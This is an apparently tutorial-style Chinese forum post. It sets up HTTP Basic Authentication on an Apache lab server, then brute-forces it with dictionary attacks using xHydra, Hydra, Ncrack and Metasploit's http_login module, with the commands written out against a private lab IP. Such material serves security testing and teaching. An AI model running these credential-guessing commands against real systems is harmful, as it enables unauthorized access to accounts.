anonymou5

 找回密码
 立即注册
搜索
查看: 53|回复: 0

多种测试HTTP身份验证的方法

[复制链接]
匿名
匿名  发表于 2019-1-24 11:41:59 |阅读模式
HTTP基础认证(BA)

在HTTP事务处理环境中,基础访问身份认证是HTTP用户代理在请求提供用户名和密码时需要使用到的一种安全方法。

实际上,HTTP基础认证(BA)是实现对Web资源访问控制的一种最简单的技术,因为它不需要设计cookie、会话识别符或登录页面,HTTP基础认证是需要使用到HTTP头中的标准字段,而且还不需要进行握手。

但是,BA机制不会为凭证的传输提供机密性保护。它只会在传输过程中对相关信息进行Base64编码,而不会采用任何形式的加密。因此,HTTPS通常需要结合BA一起使用。

实验环境搭建

1、 Apache服务器(Ubuntu 14.04)

2、 渗透测试设备(Kali Linux)

3、 设置密码认证

4、 安装Apache实用工具包

使用下列命令安装Apache2实用包:
  1. sudo apt-get install apache2 apache2-utils
复制代码
1.png

创建密码文件

使用htpasswd命令创建密码文件,Apache将会用它来验证用户身份:
  1. sudo htpasswd -c /etc/apache2/.htpasswd raj

  2. cat /etc/apache2/.htpasswd

  3. gedit etc/apache2/sites-enabled/000-default.conf
复制代码
2.jpeg

在虚拟主机设置中配置访问控制

将下列配置内容保存到000-default.conf文件中:
  1. <Directory "/var/www/html">

  2.        AuthType Basic

  3.        AuthName "Restricted Content"

  4.        AuthUserFile /etc/apache2/.htpasswd

  5.        Require valid-user

  6. </Directory>
复制代码
3.jpeg

利用.htaccess文件配置访问控制

打开Apache配置文件,修改.htaccess文件来启用密码保护,添加下列代码:
  1. sudo gedit /etc/apache2/apache2.conf

  2. ServerName localhost
复制代码
4.jpeg

将AllowOverride参数修改为“All”,保存并重启Apache服务:
  1. <Directory /var/www/>

  2.    Options Indexes FollowSymLinks

  3.    AllowOverride All

  4.    Require all granted

  5. </Directory>
复制代码
5.jpeg

现在,我们需要往受限目录中添加一个.htaccess文件。这里我们给整个网站添加限制,当然了,你也可以限制单独目录:
  1. sudo nano /var/www/html/.htaccess

  2. AuthType Basic

  3. AuthName "Restricted Content"

  4. AuthUserFile /etc/apache2/.htpasswd

  5. Require valid-user

  6. sudo service apache2 restart
复制代码
6.png

确认密码认证

在浏览器中尝试访问受限资源,确认你的内容已受保护。这里会弹出如下所示的验证框:

7.jpeg

如果你访问的内容没有弹出认证窗,或者你取消了认证页面,那你将会看到401未授权访问错误。

8.jpeg

输入正确的用户名和密码之后,你就应该可以访问网站内容了:

9.jpeg

10.jpeg

利用HTTP认证漏洞

xHydra

这是一款通过FTP端口和字典攻击入侵系统的图形化工具,在Kali中打开xHydra,选择“Single Target option”,设置目标IP,其他按下图勾选:

11.jpeg

Passwords标签页配置如下,配置好字典文件:

12.jpeg

切换到Start标签,点击“Start”,可以看到字典攻击的进度以及最终的结果:

13.jpeg

Hydra

Hydra可以针对50种协议进行快速的字典攻击,其中包括telnet、ftp、http、https、smb以及多种数据库。操作命令如下:
  1. hydra -L user.txt -P pass.txt 192.168.0.105 http-get
复制代码
14.jpeg

Ncrack

Ncrack是一款高速网络认证破解工具,它可以帮助企业测试网络安全情况,并识别弱密码。操作命令如下:
  1. ncrack -U user.txt -P pass.txt http://192.168.0.105
复制代码
15.jpeg

Metasploit

下面这个模块可以对HTTP认证服务进行攻击,打开Kali终端,输入“msfconsole”,然后输入下列命令:
  1. use auxiliary/scanner/http/http_login

  2. msf auxiliary(scanner/http/http_login) > set user_file  user.txt

  3. msf auxiliary(scanner/http/http_login) > set pass_file  pass.txt

  4. msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105

  5. msf auxiliary(scanner/http/http_login) >  set stop_on_success

  6. msf auxiliary(scanner/http/http_login) > exploit
复制代码
16.jpeg

希望这篇文章的内容可以帮助大家了解HTTP弱配置的安全风险,并帮助大家更好地提升自己网站的安全性。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2019-3-21 13:35 , Processed in 0.119731 second(s), 23 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表